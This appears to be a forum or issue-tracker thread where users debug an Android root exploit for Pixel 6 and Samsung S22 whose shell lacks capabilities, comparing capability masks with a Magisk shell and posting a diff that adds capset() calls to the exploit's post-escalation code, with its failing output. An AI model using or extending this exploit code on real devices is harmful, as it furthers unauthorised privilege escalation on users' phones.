ls: .: Permission denied

[stevejubs]

Thank you for the exploit. However, the root shell returns 'Permission denied' on Pixel 6. I need to know the root cause of the problem.

[ye4ah4]

Hi,
I encountered the same issue on the Samsung S22 and also failed to find the root cause or a solution.

[ye4ah4]

Hi,

I used a root shell obtained with Magisk to check the process capabilities:
r0q:/ # cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000

But with the root shell obtained using the exploit, the process capabilities are:
r0q:/data/local/tmp # cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 00000000000000c0
CapEff: 00000000000000c0
CapBnd: 00000000000000c0
CapAmb: 0000000000000000

Could this be the reason? Thank you. I am attempting to modify the capabilities of the exploit to be similar to Magisk's capabilities, but I am not very familiar with the code, and I haven't succeeded in making the changes yet.

Best Wishes

[ye4ah4]

I tried to modify the cap as follows, but it failed, saying that the permissions were insufficient.

--- a/exp_s22.c
+++ b/exp_s22.c
@@ -38,6 +38,7 @@
#include <sys/socket.h>
+#include <sys/capability.h>

#define MAX_PIPE_NUM 0x400
#define MAX_256_PIPE 0x400

void exploit(void) {
setuid(0);
seteuid(0);

• struct __user_cap_header_struct hdr;

• struct __user_cap_data_struct ucdata;

• hdr.version = _LINUX_CAPABILITY_VERSION; //setcaps

• hdr.pid = getpid();

• ucdata.effective = ((1 << CAP_SYS_NICE) | (1 << CAP_SETUID) | (1 << CAP_SETGID));

• ucdata.permitted = ((1 << CAP_SYS_NICE) | (1 << CAP_SETUID) | (1 << CAP_SETGID));

• ucdata.inheritable = 0xffffffff;

• if (-1 == capset(&hdr, &ucdata)) {

• printf("cap strerror(errno) %s\n",strerror(errno));

• }

  printf("cap now uid/gid: %d/%d\n", getuid(), getgid());
  system("/system/bin/sh");
  ~

when exp
cred is overwritten
cap strerror(errno) Operation not permitted
cap now uid/gid: 0/0